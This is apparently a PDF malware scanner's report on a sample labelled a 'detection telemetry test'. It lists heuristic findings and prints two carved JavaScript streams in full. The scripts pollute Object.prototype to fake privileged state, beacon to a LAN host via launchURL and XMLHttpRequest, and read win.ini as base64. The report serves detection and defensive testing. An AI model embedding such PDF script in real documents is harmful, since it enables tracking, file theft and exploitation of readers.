MALICIOUS
174
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9994
Heuristics 7
-
Acrobat prototype-pollution PoC/exploit pattern — CVE-2026-34621 related critical CVE likely CVE_2026_34621_RELATEDPDF JavaScript combines Acrobat prototype pollution targeting privileged state with an execution or sensitive file-read primitive. This matches the likely CVE-2026-34621 PoC/exploit cluster without asserting the exact internal Adobe API chain.
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Prototype-pollution JavaScript pattern high PDF_JS_PROTOTYPE_POLLUTIONPDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript issues an HTTP request on open low PDF_JS_NETWORK_BEACONEmbedded JavaScript calls a network API — this.getURL() to an http(s) URL, XMLHttpRequest, or SOAP — typically an open-time beacon / tracking pixel or data-exfil callback. This abuses a legitimate Acrobat API and exploits no vulnerability; the risk is the unsolicited outbound request (confirming recipient open or fetching a next stage).Matched line in script
try { var x = new XMLHttpRequest(); x.open("GET", "http://192.168.1.100/beacon2", false); -
PDF JavaScript opens or fetches a remote URL/document low PDF_JS_REMOTE_DOC_FETCHEmbedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads.Matched line in script
try { app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true); } catch(e1) {} -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://192.168.1.100/cve-2026-34621-beacon Referenced by PDF JavaScript
- http://192.168.1.100/beacon2Referenced by PDF JavaScript
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0004_000.js |
pdf-javascript-stream | PDF /JS object 4 at offset 0xC7 | 888 bytes |
SHA-256: c29b5f405c84012c9060fca049c5f279d22730475e17c21232b93610afbf0f63 |
|||
Preview scriptFirst 1,000 lines of the extracted script
// CVE-2026-34621 - Detection telemetry test
// Prototype pollution
try {
Object.prototype.__defineGetter__('__trusted', function() { return true; });
} catch(e) {}
// Test 1: HTTP beacon via launchURL (may spawn browser - detectable by EDR)
try {
app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
} catch(e1) {}
// Test 2: Sensitive file read (IOC mentioned in CVE blog - detectable via file access telemetry)
try {
util.readFileIntoStream({cDIPath: "C:\\Windows\\win.ini", bEncodeBase64: true});
} catch(e2) {}
// Test 3: collab/SOAP outbound (alternate network path)
try {
var x = new XMLHttpRequest();
x.open("GET", "http://192.168.1.100/beacon2", false);
x.send();
} catch(e3) {}
app.alert("Network telemetry test complete. Check CrowdStrike for:\n1. Acrobat network connections\n2. win.ini file access\n3. Browser spawn from Acrobat");
|
|||
javascript_obj0004_001.js |
pdf-javascript-stream | PDF /JS object 4 at offset 0xE8 | 1161 bytes |
SHA-256: 597d5f794aecc980716bc1279aad0a6c5e316447095ae18d8f2f0f1600bf50f2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
// CVE-2026-34621 - Detection telemetry test
// Prototype pollution
try {
Object.prototype.__defineGetter__('__trusted', function() { return true; });
} catch(e) {}
// Test 1: HTTP beacon via launchURL (may spawn browser - detectable by EDR)
try {
app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
} catch(e1) {}
// Test 2: Sensitive file read (IOC mentioned in CVE blog - detectable via file access telemetry)
try {
util.readFileIntoStream({cDIPath: "C:\\Windows\\win.ini", bEncodeBase64: true});
} catch(e2) {}
// Test 3: collab/SOAP outbound (alternate network path)
try {
var x = new XMLHttpRequest();
x.open("GET", "http://192.168.1.100/beacon2", false);
x.send();
} catch(e3) {}
app.alert("Network telemetry test complete. Check CrowdStrike for:\n1. Acrobat network connections\n2. win.ini file access\n3. Browser spawn from Acrobat");
endstream
endobj
5 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
xref
0 6
0000000000 65535 f
0000000015 00000 n
0000000082 00000 n
0000000139 00000 n
0000000199 00000 n
0000001138 00000 n
trailer
<< /Size 6 /Root 1 0 R >>
startxref
1209
%%EOF
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.